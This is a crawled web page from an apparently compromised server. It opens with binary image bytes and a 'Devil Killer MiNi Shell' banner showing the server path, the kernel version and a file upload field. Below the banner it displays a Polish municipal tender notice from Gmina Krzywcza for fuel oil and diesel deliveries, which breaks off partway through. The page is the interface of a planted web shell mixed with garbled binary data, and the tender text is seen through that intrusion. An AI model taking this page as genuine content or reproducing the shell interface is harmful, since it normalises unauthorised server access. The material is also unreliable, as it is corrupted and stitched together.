JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231227/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231227/0057166001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa oleju opałowego lekkiego do placówek oświatowych oraz oleju napędowego do Gminy Krzywcza i zakup oleju napędowego i benzyny E10 z dystrybutorów wykonawcy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krzywcza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650900393</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Krzywcza 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzywcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-755</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@krzywcza.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.krzywcza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> ogólne usługi publiczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa oleju opałowego lekkiego do placówek oświatowych oraz oleju napędowego do Gminy Krzywcza i zakup oleju napędowego i benzyny E10 z dystrybutorów wykonawcy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6384551f-a480-11ee-953e-c2ea26915e21</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00571660</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00079684/11/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa oleju opałowego lekkiego do placówek oświatowych oraz oleju napędowego do Gminy Krzywcza i zakup oleju napędowego i benzyny E10 z dystrybutorów wykonawcy.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.krzywcza.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/krzywcza</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej, która dostępna jest pod adresem internetowym:<br/>https://platformazakupowa.pl/pn/krzywcza.<br/>2. Zapytania, wnioski i inne informacje (z wyłączeniem oferty i dokumentów składanych wraz z nią) Wykonawcy przekazują za<br/>pośrednictwem funkcji „Wyślij wiadomość” dostępnej na stronie dedykowanej niniejszemu postępowaniu.<br/>3. W celu złożenia oferty i komunikowania się z Zamawiającym nie jest konieczne posiadanie przez Wykonawcę konta Użytkownika<br/>na Platformie, Wykonawca musi natomiast posiadać aktywne konto poczty elektronicznej (e-mail). Adres e-mail, którego Wykonawca<br/>chce używać do komunikowania się w postępowaniu Wykonawca podaje w Ofercie, Adres e - mail wskazany w Ofercie powinien być<br/>tożsamy z adresem, który Wykonawca wskaże na Platformie zakupowej przesyłając Ofertę. Na stronie postępowania wskazany jest<br/>link do Instrukcji dla Wykonawców.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu Platformy zakupowej opisane zostały w Regulaminie korzystania z<br/>Platformy (adres: https://platformazakupowa.pl/strona/1-regulamin). Składając ofertę Wykonawca akceptuje Regulamin.<br/>5. Jeśli Wykonawca będzie chciał założyć konto Użytkownika na Platformie wówczas konieczne jest posiadanie przez Użytkownika<br/>aktywnego konta poczty elektronicznej (e-mail). Adres e - mail wskazany w Formularzu Oferty powinien być tożsamy z adresem<br/>używanym przez Wykonawcę/Użytkownika do obsługi jego konta na Platformie. Po zarejestrowaniu się na Platformie Wykonawca<br/>będzie miał dostęp do Instrukcji dla Wykonawców również pod adresem https://platformazakupowa.pl/strona/45-instrukcje.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy to 150 MB, dopuszczalna ilość plików to 10.<br/>7. Korzystanie z Platformy odbywać się może wyłącznie na zasadach i w zakresie wskazanym w Regulaminie.<br/>8. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych,<br/>przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu,<br/>przyjmuje się datę ich przekazania na www.platformazakupowa.pl.<br/>9. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>10. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń musi być<br/>zgody z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z 30.12.2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>11.Zamawiający, zgodnie z ww.rozporządzeniem , określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na<br/>www.platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC o następującej konfiguracji:<br/>a) pamięć min. 2 GB Ram,<br/>b) procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>c) jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>d) zainstalowana dowolna przeglądarka internetowa za wyjątkiem Internet Explorer,<br/>e) włączona obsługa JavaScript,<br/>f) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>3) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozp. Parlamentu Europejskiego i Rady (UE)<br/>2016/6z27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)administratorem danych osobowych Wykonawcy oraz osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio<br/>Wykonawca pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu jest Wójt Gminy<br/>Krzywcza;<br/>2)Inspektorem Ochrony Danych w Gminie Krzywcza jest Dariusz Surówka, kontakt:Urząd Gminy Krzywcza, Krzywcza 36, 37 – 755Krzywcza, e-mail: surowkalegal@surowkalegal.pl,+48 16 671 14 86;<br/>3)Pani/a dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiot. postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania<br/>sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>4)odbiorcami Pani/a danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokument. postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>5)Pani/a dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 5 lat liczone od pierwszego dnia<br/>roku następnego po roku, w którym zakończono postęp. o udziel. zamówienia, a jeżeli czas trwania umowy przekracza 5 lat, okres<br/>przechowyw. obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/a danych osobowych bezpośrednio Pani/a dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępow. o udzielenie zamówienia publicz.; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/a danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 8) posiada Pan/i:<br/>a) na podst. art. 15 RODO prawo dostępu do danych osobowych Pani/a dotyczących,<br/>b) na podst. art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/a danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postęp. o udzielenie zamówienia publicz. ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załącz.,<br/>c) na podst. art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postęp. o udzielenie zamówienia,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/i, że przetwarzanie danych<br/>osobowych Pani/a dotyczących narusza przepisy RODO,<br/>9) nie przysługuje Pani/u:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podst. art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SGI.271.15.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Sukcesywne dostawy oleju opałowego - 58 000 litrów.<br/>2. Miejsce realizacji dostaw i pojemność zbiorników:<br/>Zespół Szkół w Krzywczy 8 x 1600 L = 12 800 L<br/>Świetlica Wiejska w Babicach 5 x 1500 L = 7 500 L<br/>Zespół Dworski w Babicach 2 x 1500 L = 3 000 L<br/>3.Olej opałowy stosowany jest jako paliwo do kotłów c.o. <br/>Przeznaczony jest do ogrzewania pomieszczeń gminnych placówek oświatowych i kulturalnych.<br/> 4.Jednorazowe dostawy realizowane będą przez Wykonawcę w ilościach zgłaszanych za pośrednictwem poczty e-mail przez Zamawiającego od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych od pracy w godzinach od 8:00 do 15:00. Dostawy będą łączone a jednorazowo będzie zamawiane 6 lub 12 tys. litrów oleju opałowego.<br/> 5.Olej opałowy musi spełniać wymagania określone Polską Normą PN-C-96024:2001, gatunek L 1, oraz Rozporządzeniem Ministra Energii z dnia 1 grudnia 2016 r. w sprawie wymagań jakościowych dotyczących zawartości siarki dla olejów oraz rodzajów instalacji i warunków, w których będą stosowane ciężkie oleje opałowe (Dz. U. z 2016r, poz. 2008) i posiadać następujące parametry podstawowe:<br/>-	wartość opałowa nie niższa niż 42,60 MJ/kg,<br/>-	pozostałość po spopieleniu nie większa niż 0,01%(m/m),<br/>-	zawartość siarki nie więcej niż 0,1%,<br/>-	zawartość wody nie większa niż 200 mg/kg,<br/>-	całkowita zawartość zanieczyszczeń nie większa niż 24 mg/kg,<br/>-	gęstość w temp 15° maksymalnie 860 kg/ m3.<br/>6.Wraz z każdorazową dostawą przedkładane będą świadectwa jakości, nie później niż w momencie dostarczenia faktury.<br/>7. Wymienione dostawy obejmują pełny zakres tj. załadunek na środek transportu, transport oraz rozładunek w miejscu przeznaczenia przy użyciu pompy na autocysternie.<br/>8.Wykonawca zobowiązany będzie dostarczyć przedmiot umowy autocysterną. Pomiar ilości dostarczanego oleju opałowego dokonywany będzie wg. elektronicznego urządzenia pomiarowego „Petro-Vend” posiadającego legalizację Obwodowego Urzędu Miar. <br/>9.Zasady wymiany informacji w tym dokumentów elektronicznych, pomiędzy podmiotami publicznymi, o których mowa w ustawie z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014r. poz. 1114) reguluje Regulamin korzystania z Platformy Usług Elektronicznych Skarbowo-Celnych (PUESC). Zgodnie z art.5 punkt 1: W przypadku przewozu towaru rozpoczynającego się na terytorium kraju podmiot wysyłający jest obowiązany, przed rozpoczęciem przewozu towaru, przesłać do rejestru zgłoszenie, uzyskać numer referencyjny dla tego zgłoszenia i przekazać ten numer przewoźnikowi. W przypadku dostawy towarów i usług, zwanej dalej ,,dostawą towarów”, podmiot wysyłający jest obowiązany również przekazać numer referencyjny podmiotowi odbierającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09135100-5 - Olej opałowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.	Zamawiający przewiduje możliwość skorzystania z prawa opcji zgodnie z art. 441 ustawy Pzp. Prawo opcji obejmuje uprawnienie Zamawiającego do zwiększenia lub zrezygnowania z zakupu lub dostaw paliw płynnych w ramach prawa opcji w ilości nie przekraczającej 15% (piętnaście procent) wynagrodzenie brutto.<br/>2.	Zamawiający będzie uprawniony do skorzystania z prawa opcji, o którym mowa w ust. 1 zgodnie z poniższymi warunkami: <br/>1). Zamawiający ma prawo skorzystać z prawa opcji najpóźniej na 1 miesiąc przed upływem terminu realizacji przedmiotu zamówienia. <br/>2) Zamawiający może przed wpływem ww. terminu złożyć oświadczenie o nieskorzystaniu z prawa opcji. <br/>3.	Skorzystanie z prawa opcji przez Zamawiającego nie jest obowiązkowe.<br/>4.	W przypadku skorzystania przez Zamawiającego z prawa opcji Wykonawcy nie przysługuje żadne roszczenie z tego tytułu poza zapłatą wynagrodzenia.<br/>5.	W przypadku nieskorzystania przez Zamawiającego z prawa opcji lub skorzystaniu z prawa opcji w niepełnym zakresie Wykonawcy nie przysługuje żadne roszczenie z tego tytułu.<br/>6.	Warunkiem skorzystania przez Zamawiającego z prawa opcji jest złożenie przez przedstawiciela Zamawiającego w terminie wskazanym w ust.2 pkt.1 powyżej, oświadczenia woli o skorzystaniu z tego prawa, w którym przedstawiciel Zamawiającego wskaże wartość, która nie może przekroczyć 15% ( piętnaście procent) wynagrodzenia. <br/>7.	Oświadczenie, o którym mowa w ust.6 Zamawiający złoży na piśmie lub w formie elektronicznej lub postaci elektronicznej z podpisem elektronicznym. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Ocenie poddane zostaną oferty niepodlegające odrzuceniu.<br/>2.Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>dot. części nr 1 <br/>- Cena (C) – waga kryterium 60 % = 60 pkt<br/>Cena złożonej oferty powinna być ceną obowiązującą z dnia poprzedzającego dzień, który Zamawiający wyznaczył jako dzień składania i otwarcia ofert. <br/>- stała marża Wykonawcy (M) – waga kryterium 20 % = 20 pkt<br/>Wykonawca, który zaoferuje najniższą marżę otrzyma = 20 pkt<br/>- zaoferowany opust/rabat (O/R) – waga kryterium 20 % = 20 pkt<br/>Wykonawca, który zaoferuje najwyższy opust/rabat otrzyma = 20 pkt<br/>3. Zasady oceny ofert w poszczególnych kryteriach:<br/>a) cena, wg opisu poniżej: <br/> cena najniższa brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% = 60pkt<br/> cena oferty ocenianej brutto<br/><br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/> <br/>b) stała marża Wykonawcy, wg opisu poniżej: <br/><br/> <br/> najniższa zaoferowana stała marża wykonawcy *<br/>M = ---------------------------------------------------------------- x 100 pkt x 20% = 20pkt<br/> oceniana zaoferowana stała marża wykonawcy<br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/><br/>c)	zaoferowany przez Wykonawcę opust/rabat, wg opisu poniżej:<br/><br/> oceniany zaoferowany przez Wykonawcę opust /rabat<br/>O/R = ------------------------------------------------------------ x 100 pkt x 20% = 20pkt<br/> najwyższy zaoferowany opust/rabat<br/><br/> * spośród wszystkich złożonych ofert niepodlegających odrzuceniu</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">stała marża Wykonawcy (M)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zaoferowany przez Wykonawcę opust/rabat (O/R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Sukcesywne dostawy oleju napędowego - 20 000 litrów w tym około: 7000 litrów oleju napędowego arktycznego.<br/>2.Miejsce realizacji dostaw i pojemność zbiorników:<br/>Gminny budynek magazynowy dz. nr ewid. 231/15 w Krzywczy zbiornik o pojemności 2 500 litrów.<br/>3.Olej napędowy przeznaczony jest do napędu wysokoprężnych silników w gminnych ciągnikach rolniczych, koparko-ładowarce, samochodzie dostawczym.<br/>4.Dostawy realizowane będą przez Wykonawcę w ilości 2 500 litrów zgłaszanych za pośrednictwem poczty e-mail przez Zamawiającego <br/>od poniedziałku do piątku z wyłączeniem dni ustawowo wolnych <br/>od pracy w godzinach od 8;00 